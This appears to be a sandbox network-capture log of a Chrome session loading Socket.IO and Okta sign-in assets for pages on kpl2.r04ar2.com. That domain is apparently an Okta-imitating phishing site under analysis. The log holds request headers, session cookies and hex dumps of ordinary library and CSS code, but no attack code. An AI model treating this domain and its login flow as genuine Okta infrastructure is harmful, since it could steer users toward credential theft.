                                                          2024-08-27 22:11:07 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 36 2e 30 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 33 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                          Data Ascii: /*! * Socket.IO v4.6.0 * (c) 2014-2023 Guillermo Rauch * Released under the MIT License. */!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof g
                                                          2024-08-27 22:11:07 UTC16384INData Raw: 6c 65 3d 21 31 3b 66 6f 72 28 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 2c 69 3d 6e 3d 3d 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 45 28 72 2c 65 2e 73 75 70 70 6f 72 74 73 42 69 6e 61 72 79 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 65 2e 77 73 2e 73 65 6e 64 28 74 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 26 26 69 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 77 72 69 74 61 62 6c 65 3d 21 30 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 64 72 61 69 6e 22 29 7d 29 2c 65 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 29 7d 29 29 7d 2c 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 28 72 29 7d 7d 2c 7b 6b 65 79 3a 22 64 6f 43 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f
                                                          Data Ascii: le=!1;for(var n=function(n){var r=t[n],i=n===t.length-1;E(r,e.supportsBinary,(function(t){try{e.ws.send(t)}catch(t){}i&&it((function(){e.writable=!0,e.emitReserved("drain")}),e.setTimeoutFn)}))},r=0;r<t.length;r++)n(r)}},{key:"doClose",value:function(){vo
                                                          2024-08-27 22:11:07 UTC12928INData Raw: 73 68 69 66 74 28 74 29 2c 74 68 69 73 2e 5f 6f 70 74 73 2e 72 65 74 72 69 65 73 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 66 72 6f 6d 51 75 65 75 65 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 76 6f 6c 61 74 69 6c 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 61 64 64 54 6f 51 75 65 75 65 28 6e 29 2c 74 68 69 73 3b 76 61 72 20 69 3d 7b 74 79 70 65 3a 45 74 2e 45 56 45 4e 54 2c 64 61 74 61 3a 6e 2c 6f 70 74 69 6f 6e 73 3a 7b 7d 7d 3b 69 66 28 69 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 72 65 73 73 3d 21 31 21 3d 3d 74 68 69 73 2e 66 6c 61 67 73 2e 63 6f 6d 70 72 65 73 73 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 69 64 73 2b 2b 2c 73 3d 6e 2e 70 6f 70 28 29 3b 74 68
                                                          Data Ascii: shift(t),this._opts.retries&&!this.flags.fromQueue&&!this.flags.volatile)return this._addToQueue(n),this;var i={type:Et.EVENT,data:n,options:{}};if(i.options.compress=!1!==this.flags.compress,"function"==typeof n[n.length-1]){var o=this.ids++,s=n.pop();th
                                                          2024-08-27 22:11:07 UTC110INData Raw: 70 61 74 68 2c 6e 29 7d 72 65 74 75 72 6e 20 69 28 50 74 2c 7b 4d 61 6e 61 67 65 72 3a 78 74 2c 53 6f 63 6b 65 74 3a 53 74 2c 69 6f 3a 50 74 2c 63 6f 6e 6e 65 63 74 3a 50 74 7d 29 2c 50 74 7d 29 29 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 73 6f 63 6b 65 74 2e 69 6f 2e 6d 69 6e 2e 6a 73 2e 6d 61 70 0a
                                                          Data Ascii: path,n)}return i(Pt,{Manager:xt,Socket:St,io:Pt,connect:Pt}),Pt}));//# sourceMappingURL=socket.io.min.js.map


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          37192.168.2.44980513.33.187.684431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:07 UTC598OUTGET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1
                                                          Host: ok4static.oktacdn.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: text/css,*/*;q=0.1
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: style
                                                          Referer: https://kpl2.r04ar2.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:11:07 UTC770INHTTP/1.1 200 OK
                                                          Content-Type: text/css
                                                          Content-Length: 222931
                                                          Connection: close
                                                          Date: Wed, 14 Aug 2024 14:24:15 GMT
                                                          Server: nginx
                                                          Last-Modified: Tue, 14 May 2024 21:48:24 GMT
                                                          ETag: "0329c939fca7c78756b94fbcd95e322b"
                                                          x-amz-meta-sha1sum: 7b5499b46660a0348cc2b22cae927dcc3fda8b20
                                                          Expires: Thu, 14 Aug 2025 14:24:15 GMT
                                                          Cache-Control: max-age=31536000
                                                          Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                          Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                          Access-Control-Allow-Origin: *
                                                          Accept-Ranges: bytes
                                                          Vary: Accept-Encoding
                                                          X-Cache: Hit from cloudfront
                                                          Via: 1.1 c8faaa7d637dd73af72e1355a476ffc2.cloudfront.net (CloudFront)
                                                          X-Amz-Cf-Pop: FRA60-P9
                                                          X-Amz-Cf-Id: B5yWcC492ATCaq7pAvZVd5MNu9e6HWpSnde0dTeVuU6Qs08V_QgLBw==
                                                          Age: 1151212
                                                          2024-08-27 22:11:07 UTC16384INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2e 71 74 69 70 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 2e 35 70 78 3b 6c 65 66 74 3a 2d 32 38 30 30 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 32 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 32 38 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 35 30 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 32 38 30 30 30 70 78 7d 2e 71 74 69 70 2d 63 6f 6e 74 65 6e 74 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 70 61 64 64 69 6e 67 3a 35 70 78 20 39 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 71
                                                          Data Ascii: @charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.q
                                                          2024-08-27 22:11:07 UTC16384INData Raw: 66 6f 72 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 64 69 73 6d 69 73 73 2d 69 63 6f 6e 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 2a 3d 22 2d 33 32 22 5d 3a 61 66 74 65 72 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 2a 3d 22 2d 33 32 22 5d 3a 62 65 66 6f 72 65 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 5e 3d 22 2d 33 32 22 5d 3a 61 66 74 65 72 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 5e 3d 22 2d 33 32 22 5d 3a 62 65 66 6f 72 65 7b 73 70 65 61 6b 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 2d
                                                          Data Ascii: fore{font-size:32px;position:absolute}#okta-sign-in .dismiss-icon,#okta-sign-in [class*="-32"]:after,#okta-sign-in [class*="-32"]:before,#okta-sign-in [class^="-32"]:after,#okta-sign-in [class^="-32"]:before{speak:none;-webkit-font-smoothing:antialiased;-
                                                          2024-08-27 22:11:07 UTC2410INData Raw: 6e 74 3a 22 5c 65 30 31 64 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 6f 75 70 2d 72 65 6d 6f 76 65 2d 31 36 3a 61 66 74 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 37 63 63 30 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 30 61 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 6f 75 70 2d 6d 65 6d 62 65 72 2d 61 64 64 2d 31 36 3a 62 65 66 6f 72 65 7b 63 6f 6c 6f 72 3a 23 35 65 35 65 35 65 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 30 64 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 6f 75 70 2d 6d 65 6d 62 65 72 2d 61 64 64 2d 31 36 3a 61 66 74 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 37 63 63 30 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 30 31 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 6f 75 70 2d 6d 65 6d 62 65 72 2d 72 65 6d 6f 76 65
                                                          Data Ascii: nt:"\e01d"}#okta-sign-in .group-remove-16:after{color:#007cc0;content:"\e00a"}#okta-sign-in .group-member-add-16:before{color:#5e5e5e;content:"\e00d"}#okta-sign-in .group-member-add-16:after{color:#007cc0;content:"\e001"}#okta-sign-in .group-member-remove
                                                          2024-08-27 22:11:07 UTC16384INData Raw: 72 3a 23 66 31 64 31 30 64 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 30 35 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 61 70 70 73 2d 31 36 2d 72 65 64 3a 62 65 66 6f 72 65 7b 63 6f 6c 6f 72 3a 23 65 33 34 38 34 33 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 32 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 6f 64 65 2d 62 72 61 63 6b 65 74 73 2d 31 36 3a 62 65 66 6f 72 65 7b 63 6f 6c 6f 72 3a 23 35 65 35 65 35 65 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 33 38 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 72 65 66 72 65 73 68 2d 31 36 3a 62 65 66 6f 72 65 7b 63 6f 6c 6f 72 3a 23 35 65 35 65 35 65 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 33 65 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 72 65 66 72 65 73 68 2d 31 36 2d 62 6c 75 65 3a 62 65
                                                          Data Ascii: r:#f1d10d;content:"\e005"}#okta-sign-in .apps-16-red:before{color:#e34843;content:"\e042"}#okta-sign-in .code-brackets-16:before{color:#5e5e5e;content:"\e038"}#okta-sign-in .refresh-16:before{color:#5e5e5e;content:"\e03e"}#okta-sign-in .refresh-16-blue:be
                                                          2024-08-27 22:11:07 UTC9200INData Raw: 72 6f 70 64 6f 77 6e 2e 64 72 6f 70 64 6f 77 6e 2d 65 64 69 74 20 2e 6f 70 74 69 6f 6e 20 2e 6f 70 74 69 6f 6e 2d 6c 69 6e 6b 7b 70 61 64 64 69 6e 67 3a 36 70 78 20 38 70 78 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 64 72 6f 70 64 6f 77 6e 2d 65 64 69 74 2d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 3a 23 62 62 62 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 20 34 70 78 20 34 70 78 20 30 3b 6d 61 72 67 69 6e 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 35 35 70 78 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 70 74 69 6f 6e 2d 73 75 62 74 69 74 6c 65 7b 63 6f 6c 6f 72 3a 23 61 37 61 37 61 37 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 23 6f 6b 74 61 2d 73 69 67 6e
                                                          Data Ascii: ropdown.dropdown-edit .option .option-link{padding:6px 8px}#okta-sign-in .dropdown-edit-button{border-left-color:#bbb!important;border-radius:0 4px 4px 0;margin:0!important;width:55px}#okta-sign-in .option-subtitle{color:#a7a7a7;font-weight:400}#okta-sign
                                                          2024-08-27 22:11:07 UTC16384INData Raw: 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 31 37 70 78 3b 74 65 78 74 2d 69 6e 64 65 6e 74 3a 2d 35 30 30 30 70 78 3b 77 69 64 74 68 3a 39 70 78 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 68 7a 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 68 7a 6e 2d 72 65 73 75 6c 74 73 2d 73 63 72 6f 6c 6c 2d 64 6f 77 6e 7b 62 6f 74 74 6f 6d 3a 30 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 68 7a 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 68 7a 6e 2d 72 65 73 75 6c 74 73 2d 73 63 72 6f 6c 6c 2d 64 6f 77 6e 20 73 70 61 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2e 2e 2f 69 6d 67 2f 75 69 2f 66 6f 72 6d 73 2f 63 68 6f 73 65 6e 2d 73 70 72 69 74 65 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 2d 34 70 78 20 2d 33 70 78 7d 23 6f 6b
                                                          Data Ascii: :inline-block;height:17px;text-indent:-5000px;width:9px}#okta-sign-in .chzn-container .chzn-results-scroll-down{bottom:0}#okta-sign-in .chzn-container .chzn-results-scroll-down span{background:url(../img/ui/forms/chosen-sprite.png) no-repeat -4px -3px}#ok
                                                          2024-08-27 22:11:07 UTC15596INData Raw: 63 68 69 6c 64 20 61 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 20 30 20 30 20 33 70 78 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 2d 74 6f 6f 6c 62 61 72 2e 75 69 2d 74 61 62 73 20 2e 6f 2d 66 6f 72 6d 2d 70 69 6c 6c 62 61 72 2e 75 69 2d 74 61 62 73 2d 6e 61 76 20 6c 69 3a 6c 61 73 74 2d 63 68 69 6c 64 3e 61 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 20 33 70 78 20 33 70 78 20 30 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 77 69 64 74 68 3a 31 70 78 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 2d 74 6f 6f 6c 62 61 72 2e 75 69 2d 74 61 62 73 20 2e 6f 2d 66 6f 72 6d 2d 70 69 6c 6c 62 61 72 2e 75 69 2d 74 61 62 73 2d 6e 61 76 20 6c 69 2e 75 69 2d 73 74 61 74 65 2d 61 63 74 69 76 65 20 61 7b 62 61 63
                                                          Data Ascii: child a{border-radius:3px 0 0 3px}#okta-sign-in .o-form-toolbar.ui-tabs .o-form-pillbar.ui-tabs-nav li:last-child>a{border-radius:0 3px 3px 0;border-right-width:1px}#okta-sign-in .o-form-toolbar.ui-tabs .o-form-pillbar.ui-tabs-nav li.ui-state-active a{bac
                                                          2024-08-27 22:11:07 UTC16384INData Raw: 75 62 74 6c 65 2e 69 6e 66 6f 62 6f 78 2d 74 65 61 63 68 3a 62 65 66 6f 72 65 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 69 6e 66 6f 62 6f 78 2e 69 6e 66 6f 62 6f 78 2d 73 75 62 74 6c 65 2e 69 6e 66 6f 62 6f 78 2d 74 69 70 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 33 35 61 62 31 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 69 6e 66 6f 62 6f 78 2d 77 61 72 6e 69 6e 67 20 2e 69 63 6f 6e 2e 70 72 6f 63 65 73 73 69 6e 67 2d 31 36 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2e 2e 2f 69 6d 67 2f 75 69 2f 69 6e 64 69 63 61 74 6f 72 73 2f 61 6a 61 78 2d 6c 6f 61 64 65 72 2d 70 72 6f 63 65 73 73 69 6e 67 2d 31 36 2e 67 69 66 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 20 30 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 68 65
                                                          Data Ascii: ubtle.infobox-teach:before,#okta-sign-in .infobox.infobox-subtle.infobox-tip:before{background-color:#835ab1}#okta-sign-in .infobox-warning .icon.processing-16{background:url(../img/ui/indicators/ajax-loader-processing-16.gif) no-repeat 0 0 transparent;he
                                                          2024-08-27 22:11:08 UTC16384INData Raw: 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 66 6f 72 67 6f 74 2d 70 61 73 73 77 6f 72 64 2d 63 61 6c 6c 2d 65 6e 61 62 6c 65 64 20 2e 6f 2d 66 6f 72 6d 2d 66 69 65 6c 64 73 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 62 75 74 74 6f 6e 2b 2e 62 75 74 74 6f 6e 2d 70 72 69 6d 61 72 79 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 66 6f 72 67 6f 74 2d 70 61 73 73 77 6f 72 64 2d 73 6d 73 2d 65 6e 61 62 6c 65 64 20 2e 6f 2d 66 6f 72 6d 2d 66 69 65 6c 64 73 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 62 75 74 74 6f 6e 2b 2e 62 75 74 74 6f 6e 2d 70 72 69 6d 61 72 79 7b 6d 61 72 67 69 6e 2d 6c 65 66
                                                          Data Ascii: {float:none;margin-bottom:15px;margin-left:0;width:100%}#okta-sign-in .forgot-password-call-enabled .o-form-fieldset-container .button+.button-primary,#okta-sign-in .forgot-password-sms-enabled .o-form-fieldset-container .button+.button-primary{margin-lef
                                                          2024-08-27 22:11:08 UTC4308INData Raw: 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 62 66 62 66 62 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2e 2e 2f 69 6d 67 2f 69 63 6f 6e 73 2f 6c 6f 67 69 6e 2f 71 75 69 63 6b 62 6f 6f 6b 73 5f 6c 6f 67 6f 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 31 32 70 78 2f 32 34 70 78 2c 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 39 30 64 65 67 2c 23 66 66 66 20 35 30 70 78 2c 23 66 62 66 62 66 62 20 30 29 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 33 63 33 63 33 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 73 6f 63 69 61 6c 2d 61 75 74 68 2d 71 75 69 63 6b 62 6f 6f 6b 73 2d 62 75 74 74 6f 6e 3a 61 63 74 69 76 65 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 73 6f 63 69 61 6c 2d 61 75 74 68 2d 71 75 69
                                                          Data Ascii: tton{background-color:#fbfbfb;background:url(../img/icons/login/quickbooks_logo.png) no-repeat 12px/24px,linear-gradient(90deg,#fff 50px,#fbfbfb 0);border:1px solid #c3c3c3}#okta-sign-in .social-auth-quickbooks-button:active,#okta-sign-in .social-auth-qui


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          38192.168.2.44980613.33.187.684431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:07 UTC607OUTGET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1
                                                          Host: ok4static.oktacdn.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: text/css,*/*;q=0.1
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: style
                                                          Referer: https://kpl2.r04ar2.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:11:07 UTC769INHTTP/1.1 200 OK
                                                          Content-Type: text/css
                                                          Content-Length: 10498
                                                          Connection: close
                                                          Date: Mon, 12 Aug 2024 13:03:19 GMT
                                                          Server: nginx
                                                          Last-Modified: Thu, 14 Mar 2024 00:03:58 GMT
                                                          ETag: "e0d37a504604ef874bad26435d62011f"
                                                          x-amz-meta-sha1sum: 4301f0d2b729ae22adece657d79eccaa25f429b1
                                                          Expires: Tue, 12 Aug 2025 13:03:19 GMT
                                                          Cache-Control: max-age=31536000
                                                          Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                          Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                          Access-Control-Allow-Origin: *
                                                          Accept-Ranges: bytes
                                                          Vary: Accept-Encoding
                                                          X-Cache: Hit from cloudfront
                                                          Via: 1.1 abf16b943a9b4039b87ccdb094d9303e.cloudfront.net (CloudFront)
                                                          X-Amz-Cf-Pop: FRA60-P9
                                                          X-Amz-Cf-Id: LNIdvVr-nnU_OPFRLXQ6wgVSofaM4sfd58d5Czb3cnCZDw1TSd7C7A==
                                                          Age: 1328868
                                                          2024-08-27 22:11:07 UTC10498INData Raw: 61 2c 61 62 62 72 2c 61 63 72 6f 6e 79 6d 2c 61 64 64 72 65 73 73 2c 61 70 70 6c 65 74 2c 62 2c 62 69 67 2c 62 6c 6f 63 6b 71 75 6f 74 65 2c 62 6f 64 79 2c 63 61 70 74 69 6f 6e 2c 63 65 6e 74 65 72 2c 63 69 74 65 2c 63 6f 64 65 2c 64 64 2c 64 65 6c 2c 64 66 6e 2c 64 69 76 2c 64 6c 2c 64 74 2c 65 6d 2c 66 69 65 6c 64 73 65 74 2c 66 6f 72 6d 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 74 6d 6c 2c 69 2c 69 66 72 61 6d 65 2c 69 6d 67 2c 69 6e 73 2c 6b 62 64 2c 6c 61 62 65 6c 2c 6c 65 67 65 6e 64 2c 6c 69 2c 6f 62 6a 65 63 74 2c 6f 6c 2c 70 2c 70 72 65 2c 71 2c 73 2c 73 61 6d 70 2c 73 6d 61 6c 6c 2c 73 70 61 6e 2c 73 74 72 69 6b 65 2c 73 74 72 6f 6e 67 2c 73 75 62 2c 73 75 70 2c 74 61 62 6c 65 2c 74 62 6f 64 79 2c 74 64 2c 74 66 6f 6f 74 2c 74
                                                          Data Ascii: a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,t


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          39192.168.2.449808188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:07 UTC1429OUTGET /12HMveiyHPabpIUo8913 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: text/css,*/*;q=0.1
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: style
                                                          Referer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:08 UTC632INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:08 GMT
                                                          Content-Type: text/css;charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Content-Disposition: inline; filename="12HMveiyHPabpIUo8913"
                                                          CF-Cache-Status: DYNAMIC
